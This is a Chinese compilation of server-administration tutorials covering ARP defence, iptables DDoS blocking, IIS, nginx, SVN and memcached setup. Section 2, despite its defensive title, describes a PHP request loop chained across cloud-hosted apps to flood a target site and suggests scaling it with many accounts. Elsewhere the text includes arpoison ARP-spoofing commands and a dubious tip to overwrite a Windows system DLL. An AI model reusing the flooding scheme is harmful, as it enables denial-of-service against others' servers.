以下是小编收集整理的Windows系统防ARP攻击的几种方法总结Windows服务器操作系统,本文共15篇,希望对大家有所帮助。本文原稿由网友“yzy2616”提供。
篇1:Windows系统防ARP攻击的几种方法总结Windows服务器操作系统
我想很多朋友都碰到过ARP攻击这种情况,导致流量大增或网站电脑打不开,下面我来给大家总结了常用见的解决ARP攻击的方法,有需要的朋友可参考,
防止ARP攻击方法一 设置权限文件方法
一、常规方式:
开始——运行,输入“regedit”,回车,通过“注册表——查找”,输入“AntiARP”,一个一个删除“AntiARP”注册表信息。
二、非常规方式(通过“安全模式”进入系统,关闭网络连接,拔掉网线):
根据ARP攻击原理:删除调用系统里的npptools.dll文件。如果你把这个DLL文件删除了,之后随便弄个DLL改名为npptools.dll即可。
防攻击文件:C:/WINDOWS/system32/ npptools.dll
处理方法:新建一个空文本文档,改名为npptools.dll然后把它复制到system32文件夹里,覆盖原有的npptools.dll,如果没关闭文件保护,先关闭。再把system32/dllcache里的npptools.dll也覆盖了,然后把它们的属性改为只读、隐藏,最后再把它们的everyone权限都去掉,即可!
npptools.dll文件的属性改为只读、隐藏后,再把它们的everyone的权限去掉,病毒就不能替换也不能使用它了,arp就不会起作用,从而达到防范ARP的目的。
如果C盘是NTFS分区格式就把权限都去掉,如果是FAT格式弄个只读就可以了
防止ARP攻击方法二 网关绑定方法
1.在预装好操作系统后成功远程连接后,可以发现在桌面上有贝壳ARP防火墙,安装防火墙是一个非常有效的方法建议用户第一时间安装
2.可以使用CMD命令对网关进行绑定。
在开始→运行→输入CMD后首先输入arp -a如图 dynamic “动态”
接下来我们输入arp -s对网关进行绑定 如图
最后我们来查看一下绑定状态 已经变为 static “静态”
当电脑上做绑定网关之后,就不会收到ARP欺骗攻击,向伪造的网关的 IP/MAC发送消息
Windows 7下修改网卡Mac地址,可以轻松防御ARP攻击
第一步:建立拨号连接
我们新建一个宽带连接(开始->控制面板->网络和Internet->查看网络状态和任务》设置新的连接或网络->连接到 Internet->接下来一步一步做就行了),我这儿建的名为“宽带连接 2”,然后在属性里找到选项,把里面的连接时显示进度和提示名称,密码和证书等前的对号都去掉,确定,
第二步:修改注册表
然后,Win+R(调出运行对话框),我们输入regedit,确定,这样就打开了注册表,注册表打开后,找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 然后在右边的窗口中新建一个字符串键,名字任取,双击此键输入键值为c:\Windows\System32\rasphone -d “宽带连接 2”(注:我的宽带连接名为“宽带连接 2”,这儿要输入你的宽带连接的名称哦),这样你可以在运行里输入msconfig找启动项看一下是不是加入了一个Windows启动项,而它的命令里就是我们的c:\Windows\System32\rasphone -d “宽带连接 2”
最后给大家总结一下防止方法
1)病毒源,对病毒源头的机器进行处理,杀毒或重新装系统。
(2)网吧管理员检查局域网病毒,安装杀毒软件。
(3)给系统安装补丁程序。
(4)给系统管理员帐户设置足够复杂的强密码。
(5)经常更新杀毒软件,安装并使用网络防火墙软件。
(6)关闭一些不需要的服务,条件允许的可关闭一些没有必要的共享,也包括C$、D$等管理共享。完全单机的用户也可直接关闭Server服务
(7)建议用户不要随便点击打开QQ、MSN等聊天工具上发来的链接信息,以免病毒的传播。
个人建义
其实我们可以在电脑中安装一个360软件就可以直接解决这个问题哦,因为360内置了防arp攻击软件哦。
篇2:服务器被DDOS攻击防御脚本总结Windows服务器操作系统
服务器给ddos攻击我收集了两种脚本代码一种是linux shell命令实现攻击,另一种就是可在任何环境下支持php代码,下面我把源码贴出来,大家可参考,
服务器被DDOS攻击防御的SHELL脚本
1.编写脚本
mkdir /root/bin
vi /root/bin/dropip.sh
#!/bin/bash
/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F: ‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if ($2!=null && $1>4) {print $2}}’>/tmp/dropip
for i in $(cat /tmp/dropip)
do
/sbin/iptables -A INPUT -s $i -j DROP
echo “$i kill at `date`”>>/var/log/ddos
done
2.增加执行权限
chmod +x /root/bin/dropip.sh
3.添加到计划任务,每分钟执行一次
crontab -e
*/1 * * * * /root/bin/dropip.sh
说明:
最重要的是第二行,获取ESTABLISHED连接数最多的前10个ip并写入临时文件/tmp/dropip,排除了内部ip段192.168|127.0开头的.通过for循环将dropip里面的ip通过iptables全部drop掉,然后写到日志文件/var/log/ddos
还一种方法就是利用php写ddos攻击,利用其它云平台来操作
主要使用sinaapp作为测试对象,
测试思路:创建4个版本的app.
版本1 主页代码如下:
file_get_contents('2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
>
版本2 主页代码:
file_get_contents('www.xxx.com/ip.php')://攻击目标
file_get_contents('3.mars.sinaapp.com/');//访问版本3
>
版本3 主页代码:
for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳
file_get_contents('www.xxx.com/ip.php');
file_get_contents('4.mars.sinaapp.com/'); }
>
版本4 主页代码:
file_get_contents('2.mars.sinaapp.com/');//访问版本2,导致死循环
>
以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。
篇3:windows系统github使用笔记Windows服务器操作系统
虽然有自己的blog很久了,不过以前写的很多脚本,总是因为这样或那样的原因没弄到blog平台上 ,而回头想复用这些脚本时,在本地disk上发现又找不到或者年久丢失了 。这便萌生了使用github存放脚本的想法
局限于办公环境是使用的win主机,所以写从github for windows入手吧 ,等改天空了再弄个linux平台下的教程出来 。
一、github for windows的安装
打开 github.com 站点,在下面会找到download github for windows下载页,如下:
该软件由于依赖windows install4.5 和 .net framework4 ,所以在安装之前,最好先安装完这两个包 ,当然也可以选择让程序自动下载安装,不过程序选择的下载源是国外的下载源,速度会很慢:
如下图所示,可以看出其下载是从亚马逊主机上进行的下载安装:
下载完成后,直接下一步下一步就行了,
其会在桌面生成两个快捷方式:git hub和git shell ,双击github并输入在github上申请的用户名和密码 。
注:如果事先安装的.net framework,在打开github时有可能会提示需要安装.net的升级包,按其要求安装NDP40-KB2468871-v2-x86 (64位系统请选择64位包)升级包即可。
二、更新与下载
1、clone
如下图所示,在相应的项目上选择clone,就会将相应的项目clone到本地,clone过的项目在本地会显示为灰色 。
2、update与sync
如下图所示,在本地编辑完成后,可以通过下面的update选项进入到commit选项上:
这里也可以在首页面双击项目名进入到commit选择,输入变更描述,按commit to master提交
提交后会在右侧面的sync上有蓝色显示,点击sync同步后,就可以更新到github上了,这里同样还有版本合并与回滚选项可以选择:
篇4:Windows创建.htaccess文件方法总结Windows服务器操作系统
在windows系统中规定不能使用无文件名的文件,这种说法好像让我们无法在Windows创建.htaccess文件了,其它方法还是有的,下面我来介绍Windows创建.htaccess文件几种方法,
创建的多种方法:
1、使用DOS命令,在DOS下有三种方法可供选择:
使用屏幕编辑命令copy con .htaccess后回车,输入内容,最后按下ctrl+z结束编辑,就成功生成了.htaccess;
使用重命名命令ren 1.txt .htaccess ,这是最常规的方法了,在windows窗口下不能执行的命令,在cmd下却如履平地;
使用重定向命令 echo. >.htaccess,这里将一个回车符输入到.htaccess,同样能创建成功;
2、用winrar的文件管理器
先新建一文本文档,然后打开winrar主界面,定位到该文件,可以直接重命名,这是我在解压一国外开源项目时,其自带的.htaccess居然能正确解压出来时,所得到的启发,当然你使用7zip之类的管理器也是可以的
3、直接通过文本编辑工具保存,例如记事本,ultraEdit等等,不过保存的时候选择所有文件就可以了
4、使用php中的文件创建方法,fopen,file_put_contents文件名直接取.htaccess就成,
5、最简单的方法:找个Linux服务器,用ftp软件上传一个txt文件,然后在服务器上面重命名为.htaccess,这个方法最简单了,呵呵。
6、打开Windows的记事本---“文件->另存为”---在另存为的“保存类型”下拉选单中选取“所有文件”类型---在“文件名”中输入.htaccess---保存
篇5:Linux防止ARP攻击一些方法总结linux操作系统
Linux防止ARP攻击我主要总结了三种,分别是:直接绑定网关方法,使用相关软件如Libnet与arpoison ,还有一种是利用arptables防arp攻击,最后自己写的shell脚本了,下面我们一起来看看,
方法一,最常用的绑定网关
一般服务器的网关是不会变动的,且vps也适用。
一、查看当前网关
[root@local@xiaohuai ~]# arp -a
? (218.65.22.122) at 80:fb:06:f2:4a:f4 [ether] on eth0
SSH执行以上命令,可查看到网关主机名、网关IP、网关MAC地址和对应的网卡。
二、绑定网关MAC
1)绑定
[root@local@xiaohuai ~]# echo ”218.65.22.122 80:fb:06:f2:4a:f4“ >/etc/safe
#ip、mac部分请根据实情修改。格式:网关IP(空格)MAC地址
2)激活使其生效
[root@local@xiaohuai ~]# arp -f /etc/safe
SSH执行以上命令,使其生效。
三、检查是否生效
[root@local@xiaohuai ~]# arp -a
? (218.65.22.122) at 80:fb:06:f2:4a:f4 [ether] PERM on eth0
再次执行arp -a命令,如下图,若句尾多了一个:PERM,则表示手动绑定生效
方法二,利用软件Libnet与arpoison
备软件
Libnet 自己去
arpoison 自己去
安装方法(FC下成功,其他发行版可参考):
先安装libnet
tar -xvzf libnet.tar.gz
cd libnet
./configure
make
make install
安装arpoison
tar -xvzf arpoison-0.6.tar.gz
cd arpoison
gcc arpoison.c /usr/lib/libnet.a -o arpoison
mv arpoison /usr/sbin
用法:
Usage: -i device -d dest_IP -s src_IP -t target_MAC -r src_MAC [-a] [-w time between packets] [-n number to send]
示例:
arpoison -i eth0 -d 172.16.18.254 -s 172.16.18.19 -t ff:ff:ff:ff:ff:ff -r 00:11:09:E8:78:DD
解释:
-i eth0 指定发送arp包的网卡接口eth0
-d 172.16.18.254 指定目的ip为172.16.18.254
-s 172.16.18.19 指定源ip为172.16.18.19
-t ff:ff:ff:ff:ff:ff 指定目的mac地址为ff:ff:ff:ff:ff:ff(arp广播地址)
-r 00:11:09:E8:C8:ED 指定源mac地址为00:11:09:E8:C8:ED
写了一个小脚本,根据注释,相信聪明智慧的各位可以搞定linux下的arp攻击了:
#!bash
#arpDefend.sh
#######
#yk103#
#######
#网关mac地址
GATEWAY_MAC=00:D0:F8:FF:4A:23
#目的mac地址
DEST_MAC=ff:ff:ff:ff:ff:ff
#目的ip地址
DEST_IP=172.16.18.254
#本地网卡接口
INTERFACE=eth0
#$INTERFACE的mac地址
MY_MAC=00:11:09:E8:78:DD
#$INTERFACE的ip地址
MY_IP=172.16.18.19
#在本机建立静态ip/mac入口 $DEST_IP–$GATEWAY_MAC
arp -s $DEST_IP $GATEWAY_MAC
#发送arp reply ,使$DEST_IP更新$MY_IP的mac地址为$MY_MAC
arpoison -i $INTERFACE -d $DEST_IP -s $MY_IP -t $DEST_MAC -r $MY_MAC 1>/dev/null &
方法三,arptables防arp攻击
Centos5安装:
#www.111cn.net
wget superb-sea2.dl.sourceforge.net/project/ebtables/arptables/arptables-v0.0.3/arptables-v0.0.3-4.tar.gz
tar zxvf arptables-v0.0.3-4.tar.gz
cd arptables-v0.0.3-4
make
make install
arptables规则设置:
arptables -F
arptables -P INPUT ACCEPT
#默认策略
arptables -A INPUT --src-ip 192.168.1.1 --src-mac 7A:31:14:42:10:01 -j ACCEPT
#允许本网段特定MAC可进入,且IP与MAC相符
arptables -A INPUT --src-mac ! 74:8E:F8:53:DC:C0 -j DROP
#拒绝非网关MAC
arptables -A INPUT --src-ip ! 192.168.1.1 -j DROP
#拒绝非网关IP
保存规则并开机加载:
iptables-save >/etc/sysconfig/arptables
/etc/init.d/arptables save
chkconfig arptables on
规则保存后重新加载会出错,去除以下文件内-o any字段,
/etc/sysconfig/arptables
方法四,shell脚本防arp攻击
代码如下复制代码#!/bin/bash
declare gw=`route -n | grep -e '^0.0.0.0'`
declare gwname=`echo $gw | grep -oe 'w*$'`
declare gwip=`echo $gw | grep -oe '[0-9]{2,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}'`
declare gwmac=`arp -n | grep -e $gwip | grep -oe '[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-
F]{2}:[0-9A-F]{2}:[0-9A-F]{2}'`
echo ”switch $gwname arp: $gwip - $gwmac to static“
arp -s $gwip $gwmac
echo ”done, off arp reuqest ..“
ifconfig $gwname -arp
echo ”all done.“
篇6:Windows 系统Web服务器配置方法Web服务器
近日,笔者将学校服务器的操作系统升级为Windows Server 2003,在Web服务器的配置过程中发现了许多与Windows Server的不同之处,为了同行少走弯路,现将配置中应注意的问题简单总结如下:
Windows Server 2003 中Internet 信息服务(IIS) 升级为IIS 6.0,其安全性更高。默认情况下,Windows Server 2003没有安装IIS 6.0,要通过控制面板来安装。具体做法为:
1. 进入“控制面板”。
2. 双击“添加或删除程序”。
3. 单击“添加/删除 Windows 组件”。
4. 在“组件”列表框中,双击“应用程序服务器”。
5. 双击“Internet 信息服务(IIS)”。
6. 从中选择“万维网服务”及“文件传输协议(FTP)服务”。
7. 双击“万维网服务”,从中选择“Active Server Pages” 及“万维网服务”等。
安装好IIS后,接着设置Web服务器,具体做法为:
1. 在“开始”菜单中选择“管理工具→Internet信息服务(IIS)管理器”,
2. 在“Internet 信息服务(IIS)管理器”中双击“本地计算机”。
3. 右击“网站”,在弹出菜单中选择“新建→网站”,打开“网站创建向导”。
4. 依次填写“网站描述”、“IP 地址”、“端口号”、“路径”和“网站访问权限”等。最后,为了便于访问还应设置默认文档(Index.asp、Index.htm)。
上述设置和Windows 2000 Server网站设置基本相同,但此时Web服务还仅适用于静态内容,即静态页面能正常浏览,常用Active Server Pages(ASP)功能没有被启用。所以还应在“Internet 信息服务(IIS)管理器”的“ Web 服务扩展”中选择允许“Active Server Pages”。
另外,还应注意如果Web服务主目录所在分区是NTFS格式,而ASP网页有写入操作时(如用到新闻后台管理功能的),要注意设置写入及修改权限。
关 键 字:邮件 服务器
篇7:windows中svn服务器迁移方法Windows服务器操作系统
下面我们一起来看看关于windows中svn服务器迁移方法,希望此例子对各位同学会带来帮助哦,
首先停掉原来的svn server
然后dump你的源svn服务器数据
#svnadmin dump D:\\svn\\snsxiu >D:\\svnbak\\snsxiu.dump
将dump后的数据文件snsxiu.dump拷贝到新的svn服务器
在新的svn服务器上
#svnadmin create D:\\svn\\snsxiu
#svnadmin load D:\\svn\\snsxiu < D:\\svnbak\\snsxiu.dump
启动新的svn服务器
在你的客户端,更换svn服务器的地址,
如果是windows,右键SVN的菜单中会有Relocate选项(TortoiseSVN),填入新的地址确认即可。
如果是linux,使用命令svn switch
#svn info
查找出原来svn的URL,更换为新的
#svn switch –relocate svn://old-svn-server/snsxiu svn://new-svn-server/snsxiu
篇8:windows 定时重启服务器方法Windows服务器操作系统
在windows系统中如果我们要定时重启服务器我们可以利用任务计划来完成,我们只要在shutdown命令,他是Windows Server 2003自带的关机程序,使用命令“shutdown -r -f -t 5”(其中r参数表示重新启动服务器可以用操作系统的计划任务调用shutdown.exe -r来实现,
具体方法
在开始--控制面板---计划任务,点添加计划任务
在浏览程序中选中c:/windows/system32/shutdown.exe,然后选每天,
添加完成后,点这个任务的属性,然后在运行中输入
C:/WINDOWS/system32/shutdown.exe -r
确定后就会生效.
篇9:Windows 系统查看端口占用以及解决端口占用Windows服务器操作系统
文章来给各位同学介绍Windows 系统查看端口占用以及解决端口占用,有需要了解的朋友不防进入参考,
相信搞PHP开发的人,经常恼怒80端口被一些其他服务占用。在没有一个行之有效的方法情况下,只能不断重启apache或nginx,或者删除那些认为可能会占用80端口的软件。
其实,我们不必这么紧张的。
解决方法如下:
1、查看占用80端口的程序:
打开命令提示符,即在运行里面输入:cmd,然后执行如下命令:
netstat -ano | findstr 80该命令的意思是:查找使用80端口的进程。
想必有一些系统常识的人都知道,一般一个程序对应一个进程。找到了进程,那么就知道对应的程序是什么了。然后,我们直接结束掉该进程即可。
该命令执行行,会输出一个列表,列表的最后一列是PID。
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2060
TCP 0.0.0.0:8800 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 1080
TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 680
TCP 192.168.100.111:80 192.168.100.111:54888 TIME_WAIT 0
TCP 192.168.100.111:49422 123.58.182.253:80 ESTABLISHED 5632可以看到第最后一行,有一个进程ID为5632的程序占用了我们的80端口,
2、通过PID找到程序:
@打开任务管理器,点击“进程”选项卡,如果里面找不到PID列,则通过如下方式打开:
任务管理器—查看—选择列—勾选PID。
然后,找到5632这个PID,结束掉该进程即可。
这样我们就解决了端口占用的问题。当然,我们还要再重启一下apache或nginx。
篇10:Windows系统用户摆脱 攻击方法介绍
上网的时候,经常会发现自己的网络防火墙在不停的发出警报,专家告诉你这就有可能是遭遇了 的攻击,那有什么办法来摆脱这些不请自来的 么?
一、取消文件夹隐藏共享
如果你使用了Windows
/XP系统,右键单击C盘或者其他盘,选择共享,你会惊奇地发现它已经被设置为“共享该文件夹”,而在“网上邻居”中却看不到这些内容,这是怎么回事呢?
原来,在默认状态下,Windows
2000/XP会开启所有分区的隐藏共享,从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”,就可以看到硬盘上的每个分区名后面都加了一个“contentrdquo;。但是只要键入“计算机名或者IPCcontentrdquo;,系统就会询问用户名和密码,遗憾的是,大多数个人用户系统Administrator的密码都为空,入侵者可以轻易看到C盘的内容,这就给网络安全带来了极大的隐患。
怎么来消除默认共享呢?方法很简单,打开注册表编辑器,进入
“HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControl\\SetSevices\\Lanman\\workstation\\parameters”
新建一个名为“AutoShareWKs”的双字节值,并将其值设为“0”,然后重新启动电脑,这样共享就取消了。
二、拒绝恶意代码
恶意网页成了宽带的最大威胁之一。以前使用Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。
一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。
运行IE浏览器,点击“工具/Internet选项/安全/自定义级别”,将安全级别定义为“安全级-高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。
三、封死 的“后门”
俗话说“无风不起浪”,既然 能进入,那说明系统一定存在为他们打开的“后门”,只要堵死这个后门,让 无处下手,便无后顾之忧!
1.删掉不必要的协议
对于服务器和主机来说,一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”,选择“属性”,再鼠标右击“本地连接”,选择“属性”,卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源,对于不需要提供文件和打印共享的主机,还可以将绑定在TCP/IP协议的NETBIOS关闭,避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”,进入“高级TCP/IP设置”对话框,选择“WINS”标签,勾选“禁用TCP/IP上的NETBIOS”一项,关闭NETBIOS.
2.关闭“文件和打印共享”
文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是 入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。
虽然“文件和打印共享”关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享”。打开注册表编辑器,选择
“HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\NetWork”
主键,在该主键下新建DWORD类型的键值,键值名为“NoFileSharingControl”,键值设为“1”表示禁止这项功能,从而达到禁止更改“文件和打印共享”的目的;键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。
3.把Guest账号禁用
有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码”,单击“高级”选项卡,再单击“高级”按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规”页中选中“账户已停用”。另外,将Administrator账号改名可以防止 知道自己的管理员账号,这会在很大程度上保证计算机安全。
4.禁止建立空连接
在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法有以下两种:
方法一是修改注册表:打开注册表
“HKEY_LOCAL_MACHINE\\System\\CurrentControl\\SetControl\\LSA”
将DWORD值“Restrict Anonymous”的键值改为“1”即可,
四、隐藏IP地址
经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。
与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。
五、关闭不必要的端口
在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口,比如,用“Norton
Internet Security”关闭用来提供网页服务的80和443端口,其他一些不常用的端口也可关闭。
六、更换管理员帐户
Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。 入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator账号。
首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。
七、杜绝Guest帐户的入侵
Guest帐户即所谓的来宾帐户,它可以访问计算机,但受到限制。不幸的是,Guest也为 入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法,所以要杜绝基于Guest帐户的系统入侵。
禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择“安全”标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能“列出文件夹目录”和“读取”等,这样就安全多了。
八、安装必要的安全软件
我们还应在电脑中安装并使用必要的防黑软件,杀毒软件和防火墙都是必备的。在上网时打开它们,这样即便有 进攻我们的安全也是有保证的。
九、防范木马程序
木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被 植入木马程序,常用的办法有:
在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。
在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目,如果有,删除即可。
将注册表里
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
下的所有以“Run”为前缀的可疑程序全部删除即可。
十、不要回陌生人的邮件
有些 可能会冒充某些正规网站的名义,然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码,如果按下“确定”,你的账号和密码就进了 的邮箱。所以不要随便回陌生人的邮件,即使他说得再动听再诱人也不上当。
十一、做好IE的安全设置
ActiveX控件和
Applets有较强的功能,但也存在被人利用的隐患,网页中的恶意代码往往就是利用这些控件编写的小程序,只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择,具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”,建议您将ActiveX控件与相关选项禁用。谨慎些总没有错!
另外,在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过,微软在这里隐藏了“我的电脑”的安全性设定,通过修改注册表把该选项打开,可以使我们在对待ActiveX控件和
Applets时有更多的选择,并对本地电脑安全产生更大的影响。
篇11:DirectAdmin 日志路径各种系统中查看方法Windows服务器操作系统
本文章收集了现在常用的系统中查看DirectAdmin 日志路径各种问题的解决办法,有需要了解的朋友可参考,
可以通过admin的Log Viewer来查看默认定义的几个日志文件。
也可以通过ssh来查看,日志文件的列表如下:
DirectAdmin:
/var/log/directadmin/error.log
/var/log/directadmin/errortaskq.log
/var/log/directadmin/system.log
/var/log/directadmin/security.log
Apache:
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpd/suexec_log
/var/log/httpd/fpexec_log
/var/log/httpd/domains/domain.com.error.log
/var/log/httpd/domains/domain.com.log
/var/log/messages (generic errors)
Proftpd:
/var/log/proftpd/access.log
/var/log/proftpd/auth.log
/var/log/messages (generic errors)
PureFTPd:
/var/log/pureftpd.log
Dovecot and vm-pop3d:
/var/log/maillog
/var/log/messages
named (bind):
/var/log/messages
exim:
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/processlog
/var/log/exim/rejectlog
(on FreeBSD, they have ”exim_“ in front of the filenames)
mysqld:
RedHat:
/var/lib/mysql/server.hostname.com.err
FreeBSD and Debian:
/usr/local/mysql/data/server.hostname.com.err
crond:
/var/log/cron
通过如下命令查看日志文件:
less /var/log/filename
/var/log/filename 日志文件路径,如果日志太大你可以使用“tail”命令:
tail -n 30 /var/log/filename
查看日志文件的最后30行,
篇12:windows服务器禁止ip访问方法介绍Windows服务器操作系统
禁止ip访问的方法有很多种最常用的就是使用防火强了,机房的防火墙可直接把指定IP给禁止访问,我们还可以使用IP安全策略功能来操作,同时还可以使用WEB服务器来禁止,
下边是方法
控制面板—管理工具—本地安全策略 或者命令 gpedit.msc
选择创建 IP 安全策略
点选下一步
我们就是要禁止他,不和他说话,那么,取消勾选
直接按完成.那个勾选是默认的
注意右下的”添加向导”,如果勾选了,取消他,然后点击”添加”
选中刚刚建立的 禁止ip 点 编辑(@添加ip)
把”添加向导”的勾选取消 , 然后点添加
地址和目标别写反了,把自己给封了
// 然后切换到 “协议” 面板
我这里是选择 tcp 到80端口 ,直接按确定,回到上层界面,继续确定,回到新规则属性面板
选择“筛选器操作”面板
这里的 阻止 是我先前做的添加的, 操作步骤为: 取消 “添加向导” 的勾选点 添加
在常规里面重命名为 阻止 就ok了
一路确定,回到
注意要 禁止ip 前面的勾选
确定,完成此策略
最后需要指派策略
到此,刚才显示的ip 116.164.68.6 地址的用户就不能访问服务器了
添加多ip 从 (@添加ip) 开始
也可以通过nginx禁止WEB通过IP访问
nginx的默认虚拟主机在用户通过IP访问,或者通过未设置的域名访问(比如有人把他自己的域名指向了你的ip)的时候生效
最关键的一点是,在server的设置里面添加这一行:
listen 80 default;
后面的default参数表示这个是默认虚拟主机,
这个设置非常有用。
比如别人通过ip或者未知域名访问你的网站的时候,你希望禁止显示任何有效内容,可以给他返回500.
目前国内很多机房都要求网站主关闭空主机头,防止未备案的域名指向过来造成麻烦。就可以这样设置:
代码如下复制代码server {listen 80 default;
return 500;
}
也可以把这些流量收集起来,导入到自己的网站,只要做以下跳转设置就可以:
代码如下复制代码server {listen 80 default;
rewrite ^(.*) www.mydomain.com permanent;
}
==============================
按照如上设置后,确实不能通过IP访问服务器了,但是在应该用中出现当server_name后跟多个域名时,其中一个域名怎么都无法访问:
设置如下:
代码如下复制代码server{
listen 80;
server_name www.abc.com abc.com
没更改之前,通过server_name 中的www.abc.com abc.com均可访问服务器,加入禁止IP访问的设置后,通过abc.com无法访问服务器了,www.abc.com可以访问
用 nginx -t 检测配置文件会提示warning:
[warn]: conflicting server name “abc.com” on 0.0.0.0:80, ignored
the configuration file /usr/local/webserver/nginx/conf/nginx.conf syntax is ok
configuration file /usr/local/webserver/nginx/conf/nginx.conf test is successful
最后通过在listen 80 default;后再加server_name _;解决,形式如下:
代码如下复制代码#禁止IP访问
server
{
listen 80 default;
server_name _;
return 500;
}
这样,通过abc.com就能访问服务器了,问题解决.
篇13:windows搭建memcached环境配置方法Windows服务器操作系统
memcached是一款数据库缓存加速的功能,他可以在很多平台中使用如windows,linux系统中都可以,下面我来介绍在windows搭建memcached环境配置方法,
Windows下的Memcache安装
1、下载memcache for windows。下载地址:jehiah.cz/projects/memcached-win32,推荐下载binaries版本,解压(本例中解压到c:memcached)。
2、在命令行状态下输入:
c:/memcached/memcached.exe -d install
至此memcached已经安装成windows服务
3、在命令行下输入:
c:/memcached/memcached.exe -d start
以启动memcached服务。当然也可以选择在windows服务中启动
你没看错,就是这么简单,简简单单的三步memcache的服务器端就准备完毕
php安装Memcached模块支持
1、下载php_memcache.dll模块,你可以从downloads.php.net/pierre/找到对应的版本,
php5.3的直接下载shikii.net/blog/downloads/php_memcache-cvs-0703-5.3-VC6-x86.zip
2、修改php.ini,添加如下内容:
extension=php_memcache.dll
3、重启apache服务器,然后查看一下phpinfo,如果有memcache,那么就说明安装成功!
测试windows下的Memcached
测试代码如下:
$mem = new Memcache;
$mem->connect(”127.0.0.1“, 11211);
$mem->set('key', 'Hello Memcached!', 0, 60);
$val = $mem->get('key');
echo $val;
更多测试代码,需要移步:
www.php.net/manual/en/memcache.examples-overview.php
Memcached的基本设置
-p 监听的端口
-l 连接的IP地址, 默认是本机
-d start 启动memcached服务
-d restart 重起memcached服务
-d stop|shutdown 关闭正在运行的memcached服务
-d install 安装memcached服务
-d uninstall 卸载memcached服务
-u 以的身份运行 (仅在以root运行的时候有效)
-m 最大内存使用,单位MB,
默认64MB
-M 内存耗尽时返回错误,而不是删除项
